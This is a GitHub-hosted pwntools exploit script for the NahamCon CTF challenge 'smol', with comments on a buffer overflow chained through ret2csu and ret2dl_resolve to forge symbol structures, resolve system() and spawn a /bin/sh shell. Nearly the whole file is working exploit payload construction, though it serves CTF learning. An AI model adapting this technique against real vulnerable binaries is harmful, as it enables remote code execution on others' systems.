-
Notifications
You must be signed in to change notification settings - Fork 3
/
smol_exploit.py
60 lines (54 loc) · 3.92 KB
/
smol_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/usr/bin/env python
#One of the best challs need to combine ret2csu + ret2dl_resolve to exploit this....
#This challenge is a normal dyamically linked program but with no functions to write into standard output stream.
#As this challenge reads input from read but with a value so much greater than the buffer size it is vulnerable to buffer overflow
#As this program does not have a output functions to leak memory addresses..
#So it's time to resolve these system function address by our own..
#So it's time to ret2dl_resolve my most favourite technique...
#This unusual method exploits the lazy binding method to resolve our own desired symbols like system,execve
#The technique is to make our own fake structs in a user controllable area
#That are used to resolve symbols by pushing a fake large reloc arg
#By returning straight to PLT section where the top of the stack has the reloc arg present ..
#Finding the perfect place for our fake structs and making the correct calculation
#And it is just a matter of seconds to pop our shell..
#Here there is not only a ret2dl_resolve but also ret2csu as reads needs 3 args
#Which can only be setup by ret2csu method if absence of pop rdx gadget
from pwn import *
import time
e = ELF("./smol")
r = process("./smol") #As the nahamcon remote container for the pwn challenges have been closed lets exploit this binary locally
bin_sh = 0x4040d8 #Address where we are going to place the bin_sh string in our controlled area .bss
st_name = 0x3c48 #Offset from strtab to the name of the function to be resolved
payload1 = b'A' * 12 #Padding to modify ret address
payload1+=p64(0x4011ca) #Return to csu gadget 1
payload1+=p64(0x807c5) #Setup the rbx register for the call to init whose pointer present in dynamic section to preserve reg values
payload1+=p64(0x807c6) #To pass the compare where rbx + 1 is compared with rbp
payload1+=p64(0) #fd 0 passed to r12 which in turn passed to rdi in csu gadget 2
payload1+=p64(0x404088) #Address where to passed the second input which is .bss to r13 which in turn passed to rsi
payload1+=p64(0x58) #Size to read passed to r14 which in turn passed to rdx
payload1+=p64(0) #null in r15
payload1+=p64(0x4011b0) #return to csu gadget 2
payload1+=p64(0) * 7 #after the call null up the registers or with any junk which will not be needed for any from now
payload1+=p64(0x401040) #return to make read again
payload1+=p64(0x401164) #Just a ret gadget to prevent stack alignment failure in ubuntu 18.04 or later version
payload1+=p64(0x4011d3) #Address of pop rdi gadget
payload1+=p64(bin_sh) #Address of bin_sh string that is passed in second input
payload1+=p64(0x401020) #Return to PLT section
payload1+=p64(0x275) #A fake large reloc arg for pointing our fake rel struct
r.send(payload1) #Send the first payload
time.sleep(0.4) #Time difference to send the next payload
payload2 = p64(0x404020) #The address of read .got.plt address where our system function resolved address will be present
payload2+=p64(0x28900000007) #The r_info value points to our sym structs
payload2+=p64(0) * 4 #Padding null in rel struct and other 3 64 bit null for the padding between sym struct
payload2+=p32(st_name) #Offset between strtab and our system function string name
payload2+=p8(0x12) #Symbol binding and visibilit type
payload2+=p8(0) #Some important nulls in sym struct
payload2+=p16(0)
payload2+=p64(0) * 2
payload2+=b"system\x00\x00" #system function string
payload2+=b"/bin/sh\x00" #Address of /bin/sh string passed as arg to system function
r.send(payload2) #Send the second payload
r.interactive() #Our much awaited shell
r.close()
#When submitting the flag..THere was a note in the challenge description that said u may need to bruteforce that was the moment when
#I came to know that it is a unintended solution ...And moreover my exploit was one shot that took the RCE in seconds..